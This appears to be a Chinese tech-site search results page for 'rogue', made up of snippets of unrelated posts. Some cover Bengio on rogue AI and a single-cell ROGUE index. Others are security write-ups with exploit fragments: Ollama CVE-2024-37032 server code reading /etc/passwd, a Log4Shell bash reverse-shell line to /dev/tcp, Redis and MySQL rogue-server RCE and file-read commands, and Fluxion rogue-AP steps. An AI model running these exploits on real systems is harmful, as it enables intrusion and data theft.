首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏量子位

    图灵奖得主Bengio最新长文:人类大脑是生物机器,一定会有超级智能AI超越它

    于是Bengio团队做了一系列的正式定义Rogue AI、假设和主张,并讨论了发生条件、可能情况以及规避策略。 Rogue AI如何出现 定义1:一个潜在的Rogue AI,是一个自主的人工智能系统,其行为方式可能会对大部分人类造成灾难性伤害,可能会危及我们的社会,甚至我们的物种或生物圈 。 然而最新进展表明,超级智能AI(全面比人类聪明)的建立离我们预期比以前更近,我们不清楚如何防止潜在的Rogue AI产生。 Rogue AI是目标驱动的。 更深入了解Rogue AI的产生方式,需要在技术和政策方面的努力。 如果这些目标不严格包括人类和生物圈的福祉,即不足以与人类的权利和价值观保持一致,那么这样的系统就有可能成为潜在的Rogue AI。 下面这些情况都将可能导致Rogue AI的出现: 不怀好意的人类。

    34020编辑于 2023-08-03
  • 来自专栏网络安全攻防

    【AI安全漏洞】Ollama远程代码执行(附加:MSF利用方式)

    server"} # for ollama pull @app.get("/v2/rogue/bi0x/manifests/latest") async def fake_manifests(): /etc/passwd\"" return 'cve-2024-37032-test' @app.head(f"/root/.ollama/models/manifests/{HOST}/rogue /root/.ollama/models/manifests/dev-lan.bi0x.com/rogue/bi0x/latest" response.headers["E-Tag"] = "\ /root/.ollama/models/manifests/{HOST}/rogue/bi0x/latest","size":10}]} @app.head("/root/bad.so") async /tmp/notfoundfile\"" return 'cve-2024-37032-test' # for ollama push @app.post("/v2/rogue/bi0x/blobs

    17610编辑于 2026-04-17
  • 来自专栏生信技能树

    单细胞亚群该细分到什么程度呢?

    如何计算ROGUE index呢 有一个r包可以完成,大家可以安装它并且读一下它的官网说明书 : # devtools::install_github("PaulingLiu/ROGUE") # https ://github.com/PaulingLiu/ROGUE/blob/master/vignettes/ROGUE_Tutorials.html 仍然是使用大家熟悉的数据集作为案例: library 是很小的: > rogue.value [1] 0.7476979 # ROGUE范围为0~1,ROGUE = 1表面该亚群纯度很高; # 相反ROGUE ~0,表面该亚群纯度较低可以被继续细分 # ROGUE评分默认>0.9时是一致性比较高的细胞亚类 我们有两个方法可以看看具体的每个单细胞亚群的ROGUE index rogue.res <- rogue(expr, labels = sce$seurat_annotations rogue.boxplot(rogue.res ) > as.data.frame(t(rogue.res)) pbmc3k Memory.CD4.T 0.9727606

    63710编辑于 2024-11-21
  • 来自专栏Khan安全团队

    针对流行的 Java 库 Log4j 的零日漏洞利用

    请注意,仅仅阻止默认端口是不够的,因为攻击者可以自由选择端口来运行 Rogue LDAP 服务器。通常,通过将所需流量列入白名单来限制传出服务器流量是一个好主意。 ://159.89.182.117/wp-content/themes/twentyseventeen/ldm # Kinsing payload URL 45.130.229.168:1389 # Rogue LDAP server 82.118.18.201:1534 # Rogue LDAP server 45.130.229.168:1389 # Rogue LDAP server 185.250.148.157 :1389 # Rogue LDAP server 92.242.40.21:5557 # Rogue LDAP server 205.185.115.217:47324 # Rogue LDAP server 163.172.157.143:1389 # Rogue LDAP server 45.155.205.233:12344 # Rogue LDAP server 如果您使用基于 Snort 或 Suricata

    67430编辑于 2022-01-06
  • 来自专栏安全

    phpMyAdmin LOAD DATA INFILE 任意文件读取漏洞

    漏洞利用 EXP: https://github.com/Gifts/Rogue-MySql-Server/blob/master/rogue_mysql_server.py 此处我们使用 VulnSpy 使用vim编辑rogue_mysql_server.py文件,将PORT = 3306修改为PORT = 3307 PORT为监听端口,filelist为要读取的文件 5). 运行python rogue_mysql_server.py,启动服务 6). 打开phpMyAdmin的登录页面,地址输入db:3307、用户名vulnspy、密码vulnspy,提交登录。

    2.5K40发布于 2018-12-15
  • 来自专栏Khan安全团队

    Unifi Log4jshell漏洞利用

    首先,您需要从以下链接的 GitHub 存储库中克隆和构建工具 rogue-jndi: veracode-research / rogue-jndi 用于 JNDI 注入攻击的恶意 LDAP github.com:veracode-research/rogue-jndi 在尝试编译此工具之前,请确保已安装 Maven 和 Java。 这个单线应该做你需要的一切: git clone https://github.com/veracode-research/rogue-jndi && cd rogue-jndi && mvn package echo 'bash -c bash -i >&/dev/tcp/192.168.11.50/4444 0>&1' | base64 使用 Base64 输出,在 rogue-jndi 中构建您的命令 然后启动您的 rogue-jndi LDAP 服务器。

    3.3K10编辑于 2022-01-05
  • 来自专栏镁客网

    Imagination升级PowerVR图形架构,高端移动设备或将迎来重大升级

    近日,Imagination发布了新PowerVR图形架构Furian,这也是自2010年Rogue推出以来的第一个主要图形架构升级。 目前,iPhone 7的GPU是基于Rogue的,相较于Rogue,Furian将集群从12个提升至60个,总体性能提高了35%,游戏性能提高了70%—90%。

    67640发布于 2018-05-28
  • 来自专栏字节脉搏实验室

    CNVD-2019-21763(复现)

    漏洞检测 下载exp到本地: git clone https://github.com/LoRexxar/redis-rogue-server.git 下载执行模块: git clone https:/ /github.com/n0b0dyCN/RedisModules-ExecuteCommand.git 然后将该模块编译:make 在当前目录下会生成一个module.so 将其复制到redis-rogue-server 目录下并改名为exp.so 在攻击机上执行命令: python3 redis-rogue-server.py --rhost 192.168.232.170 --rport 6379 --lhost 192.168.232.129 参考链接: https://s.tencent.com/research/bsafe/755.html https://github.com/LoRexxar/redis-rogue-server https

    3.8K30发布于 2020-05-12
  • 来自专栏大数据文摘

    D-News | 摩拜微软合作,发力云计算和AI;AI将参加2017年数学高考

    资本动态 VR内容工作室The Rogue Initiative完成百万级美元A轮融资 虚拟现实内容工作室The Rogue Initiative已经完成了7位数的A轮融资,由位于中国的CBT Capital The Rogue Initiative将会利用这笔资金进一步开发传统和沉浸式电影电视项目、娱乐内容IP以及相关技术。 The Rogue Initiative此前宣布,他们将与好莱坞著名导演迈克尔·贝合作拍摄原创娱乐内容,而迈克尔·贝将持股The Rogue Initiative,并作为战略合作伙伴和顾问。 制片琳达·奥布斯特(《星际穿越》、《超时空接触》和《西雅图夜未眠》)同样与The Rogue Initiative达成了类似的合作关系。

    75730发布于 2018-05-24
  • 来自专栏VRPinea

    5.27 VR扫描:VR内容工作室完成百万级融资;Meta 2开发者套件确认跳票

    The Rogue Initiative完成百万级美元A轮融资 《Crowe: The Drowned Armory》 近日,VR内容工作室The Rogue Initiative确认完成了7位数的A The Rogue Initiative表示将会利用这笔资金进一步开发传统和沉浸式电影电视项目、娱乐内容IP、以及相关技术。 VRPinea独家点评:打造优质内容才能营造良好的VR生态。

    595140发布于 2018-05-16
  • 来自专栏FreeBuf

    “净广大师”病毒HTTPS劫持技术深度分析

    2f5a9fc32567140253bf49153b22cf5c868ed06e Rootkit/NetSec.a 3470f3b06f387bb7bb55459c0786f6ed512e926d Rogue /NetSec.gen 0a1655d06ed5a6550b495df627cd76bd0ab046ff Rogue/NetSec.gen 0c9226676127709d032cff8c695c14abba49c3cf Rogue/NetSec.gen 177f5703f4ba8c146e955b5bdfe6860d4cb4f7f1 Rogue/NetSec.gen 1fb098637af04af4b7f7cd4bf3521d8d0d1f716c Rogue/NetSec.gen 25670f556ee4fd376164dcb43cf06ae1bad26dd5 Rogue/NetSec.gen 25822c34eabe5c1a0d1051a1836f5b50196c7f08 Rogue/NetSec.gen 297b687805f31cde2be0d55e7ec25acfdbd9a02c 本文作者:火绒安全,未经许可禁止转载

    1.9K80发布于 2018-02-09
  • 来自专栏网络攻防实战知识交流

    Redis 4.x 5.xRCE的傻瓜式复现

    target redis port, default 6379 -L LHOST, --lhost LHOST rogue server ip -P LPORT, --lport LPORT rogue server listen port, default 21000

    67030发布于 2019-07-23
  • 来自专栏Timeline Sec

    Redis基于主从复制的RCE 4.x/5.x 复现

    https://github.com/Ridter/redis-rce.git //下载漏洞利用脚本 注意,这里少一个.so的文件,到https://github.com/n0b0dyCN/redis-rogue-server 参考链接: https://github.com/Ridter/redis-rce https://github.com/n0b0dyCN/redis-rogue-server https://www.cnblogs.com

    1.7K20发布于 2019-12-15
  • 来自专栏FreeBuf

    渗透测试之地基服务篇:服务攻防之数据库Redis

    1、下载 https://github.com/n0b0dyCN/redis-rogue-server//未授权https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server 3、执行反弹 1)执行反弹 python3 redis_rogue_server.py -rhost 192.168.253.27 -lhost 192.168.253.9 -passwd dayu123 2、下载 https://github.com/n0b0dyCN/redis-rogue-server//未授权https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server //有密码 将redis-rogue-server的exp.so文件复制到Awsome文件夹中使用,因为exp.so带system模块! 2)开启主服务器 python3 redis_rogue_server.py -v -path exp.so 开启15000端口的主服务器!

    1.3K10编辑于 2023-03-30
  • 来自专栏安全泰式柑汁

    关于MySQL LOAD DATA特性的利用与思考

    下载漏洞利用工具:Rogue-MySql-Server,配置完之后在服务上启动 填写服务器地址,访问 ? 成功读取到目标的/etc/passwd文件 尝试读取web目录文件 ? AB%AF%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6/ https://xz.aliyun.com/t/6587 https://github.com/allyshka/Rogue-MySql-Server

    1.3K21发布于 2020-08-06
  • 来自专栏一个安全研究员

    Fluxion 4使用指导

    Spawns a rogue (fake) AP, imitating the original access point. Spawns a jammer, deauthenticating all clients from original AP and luring them to the rogue AP. Select an internet connectivity type for the rogue network. ? clients, and some Android clients to not show the captive portal immediately upon connecting to the rogue Select a captive portal interface for the rogue network.

    2.1K20发布于 2020-08-05
  • 来自专栏HACK学习

    MySQL 服务端恶意读取客户端任意文件漏洞

    攻击机(服务端): Kali Linux 192.168.43.247 受害机(客户端): Ubuntu 192.168.43.82 首先下载大佬写好的POC脚本 Rogue-MySql-Server, 找到 rogue_mysql_server.py 脚本的第26行处的元组 filelist: ? 然后在攻击机(服务端)上执行rogue_mysql_server.py脚本: python rogue_mysql_server.py ? image-20210407175447854 当客户端连上攻击机搭建的服务端瞬间,服务端便可以读取到受害机客户端上的/etc/passwd,并记录到 Rogue-MySql-Server 中的日志文件中 首先在自己vps上面使用 rogue_mysql_server.py 搭建一个恶意的MySQL服务端(如果MySQL端口冲突可以换一个端口,这里我改成了3307端口): ?

    5.4K80发布于 2021-04-26
  • 来自专栏Seebug漏洞平台

    Redis 基于主从复制的 RCE 利用方式

    然后启用redis 5.0的docker ubuntu@VM-1-7-ubuntu:~/lorexxar/redis-rogue-server$ sudo docker ps CONTAINER ID 然后直接通过脚本来攻击服务端 ubuntu@VM-1-7-ubuntu:~/lorexxar/redis-rogue-server$ python3 redis-rogue-server_5.py -- r\n$2\r\nNO\r\n$3\r\nONE\r\n' [->] b'+OK\r\n' 然后我们链接上去就可以执行命令 ubuntu@VM-1-7-ubuntu:~/lorexxar/redis-rogue-server

    3.6K20发布于 2019-07-31
  • 来自专栏网络技术联盟站

    思科 | ME 系统相关的一些命令

    ----------------------- ------------------------------------------------- 0 Thu Aug 4 19:54:14 2005 Rogue : 00:0b:85:18:b6:50 Interface no:1(802.11 b/g) with RSSI: -78 and SNR: 10 1 Thu Aug 4 19:54:14 2005 Rogue : 00:0b:85:18:b6:50 Interface no:1(802.11 b/g) with RSSI: -72 and SNR: 16 2 Thu Aug 4 19:54:14 2005 Rogue

    82120发布于 2020-04-10
  • 来自专栏SDNLAB

    报告:5G网络切片可能会给不法分子留下漏洞!

    AdaptiveMobile将其描述为切片上的流氓网络功能(rogue network function)。 Rogue Slice Gains Potential Access to Other Slice Resources 根据AdaptiveMobile的说法,这是真实可能会发生的,因为当前的网络切片功能规范不要求在同一网络上的不同切片之间进行

    69820发布于 2021-04-16
领券